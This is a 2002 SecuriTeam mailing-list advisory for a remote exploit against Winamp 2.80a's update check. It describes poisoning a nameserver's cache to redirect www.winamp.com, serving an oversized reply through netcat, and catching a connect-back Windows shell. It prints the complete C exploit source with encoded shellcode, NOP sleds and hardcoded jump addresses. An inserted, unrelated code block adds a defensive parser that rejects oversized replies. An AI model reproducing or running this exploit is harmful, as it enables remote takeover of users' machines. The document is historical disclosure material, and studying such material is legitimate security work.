[EXPL] Remote Winamp Exploit (Product Updates)


From: support@securiteam.com
To: list@securiteam.com
Date: Sun,  7 Jul 2002 07:57:48 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Remote Winamp Exploit (Product Updates)
------------------------------------------------------------------------

SUMMARY

Winamp includes an option, enabled by default, which checks on startup for
the latest version from http://www.winamp.com and then notifies the user of
a possible upgrade via a message box. Unfortunately, if it receives a huge
response, the thread parsing the data is thrown into an infinite loop and
eventually the exception dispatcher is called. Then, as is most often the
case, an overflow occurs.
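
An added example, not part of the advisory or of Winamp's code: one way an update-check client can refuse the oversized reply described above instead of parsing it. The function name, the 512-byte cap, the allowed version characters and the reply layout (status line, blank line, version line) are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_RESPONSE 512  /* assumed cap: a version reply needs only a few bytes */
#define MAX_VERSION  15   /* assumed longest version string, e.g. "2.80a" */
enum { UPD_OK = 0, UPD_TOO_BIG = -1, UPD_MALFORMED = -2 };

/* Hypothetical hardened parser: copies the version line of an update-check
 * reply into out, or rejects the reply. Never reads past len bytes of buf
 * and never writes past out_cap bytes of out. */
int parse_update_reply(const char *buf, size_t len, char *out, size_t out_cap)
{
    size_t i, start = 0, n = 0;

    if (len > MAX_RESPONSE)                 /* refuse oversized replies up front */
        return UPD_TOO_BIG;
    for (i = 0; i + 4 <= len; i++)          /* find end of headers, bounded by len */
        if (memcmp(buf + i, "\r\n\r\n", 4) == 0) { start = i + 4; break; }
    if (start == 0)
        return UPD_MALFORMED;
    /* version line: digits, dots and lowercase letters only, ended by CR */
    for (i = start; i < len && buf[i] != '\r'; i++, n++) {
        unsigned char c = (unsigned char)buf[i];
        if (!(isdigit(c) || islower(c) || c == '.'))
            return UPD_MALFORMED;
        if (n >= MAX_VERSION || n + 1 >= out_cap)
            return UPD_MALFORMED;           /* too long to be a version string */
        out[n] = (char)c;
    }
    if (n == 0 || i >= len)                 /* empty line, or no terminating CR */
        return UPD_MALFORMED;
    out[n] = '\0';
    return UPD_OK;
}

int main(void)
{
    /* constructed samples: a well-formed reply and an oversized one */
    const char good[] = "OK\r\n\r\n9.99\r\n\r\n";
    static char huge[35904];
    char ver[MAX_VERSION + 1];
    int rc = parse_update_reply(good, sizeof good - 1, ver, sizeof ver);

    printf("good reply: rc=%d version=%s\n", rc, rc == UPD_OK ? ver : "-");
    memset(huge, 'A', sizeof huge);
    printf("huge reply: rc=%d\n", parse_update_reply(huge, sizeof huge, ver, sizeof ver));
    return 0;
}
```

The caller must also bound the network read itself, so that `len` can never exceed the size of the receive buffer.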

DETAILS

Example:
Nameserver - 192.168.0.1
Attacker - 192.168.1.2
Victim (windows machine) - 192.168.0.2

1) Attacker poisons nameserver cache.

192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2

2) Victim is now resolving www.winamp.com to attacker machine.

192.168.0.2:
C:\>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1

Name: www.winamp.com
Address: 192.168.1.2

3) Attacker fires up exploit as web daemon.

192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80

4) Attacker waits for connect-back by exploit.

192.168.1.2:
x@x:~$ nc -l -p 5555

5) Winamp is opened on the client's side.

6) Client tries to update, causing a crash and the execution of code.

192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

Exploit:
/*
wampexp.c
July 3rd, 2002

Winamp 2.80a and all previous remote exploit (connect-back styles)

        winamp has an option, enabled by default, which checks for the latest
        version from www.winamp.com and will then notify the user of a possible
        upgrade via a messagebox..

        unfortunately, if it were to receive a huge response via some nameserver
        corruption the thread parsing the response is thrown into an infinite
        loop and eventually the exception dispatcher is called.. and THEN like
        most of the time under windows a big, bad, overflow occurs..
        
        ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80
            # nc -l -p 5555
            *poisoned user opens winamp*
            # nc -l -p 5555
            Microsoft Windows 2000 [Version 5.00.2195]
            (C) Copyright 1985-2000 Microsoft Corp.
            
            C:\>
        
sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55
(c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

yes, yahoo took away my 2! ;~~~
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>

// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";

// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

main(char argc, char **argv){
int i;
        unsigned short int a_port;
        unsigned long a_host;
        struct hostent *ht;
        struct sockaddr_in sin;
        
        if (argc < 3){
        printf("Winamp 2.80a remote exploit (7/3/2002)\n");
        printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");
        printf("usage: %s <localhost> <localport>\n\n", argv[0]);
        printf("NOTE: target os is 2000.. probably works on all\n");
        printf("winamp versions prior to 2.80a as there are no \n");
        printf("dependancies on winamp, only the static ws2help\n\n");
        exit(-1);
}

// blatantly ripped! *TEEHEEEHHEH*
        a_port = htons(atoi(argv[2]));
        a_port ^= 0x9595;
        if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
        a_host = *((unsigned long *)ht->h_addr);
        a_host ^= 0x95959595;
        shell[385] = ((a_port) & 0xff);
        shell[386] = ((a_port >> 8) & 0xff);
        shell[390] = ((a_host) & 0xff);
        shell[391] = ((a_host >> 8) & 0xff);
        shell[392] = ((a_host >> 16) & 0xff);
        shell[393] = ((a_host >> 24) & 0xff);
        
        strcat(payload, shell);
        
        // lots of NOPs
        for(i=792;i<9704;i++)
                strcat(payload, "\x90");

        // we land here when we jmp ebx the second time
        // this sets ebx to the start of our shell, and jmps back
        strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
strcat(payload, "\x11\x01\xff\xe3");

        // lots more NOPs for lots more fun
        for(i=9718;i<35809;i++)
                strcat(payload, "\x90");
 
        // and bh, dl; jmp ebx.. this allows us to jmp back into an area
        // where we can put some real code
        strcat(payload, "\x22\xfa\xff\xe3");
        
        // our "eip" (call ecx; ntdll.dll@0x11936)
        // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
        strcat(payload, "\xd6\x19\x02\x75");

// if ws2help doesn't match for some reason, use this call ebx..
// dependant on the winamp in_wm.dll plugin
//strcat(payload, "\x57\x22\x12\x01");
 
        strcat(payload, "\x0d\x0a");

printf("%s", payload);
}

ADDITIONAL INFORMATION

The information has been provided by Anonymous.
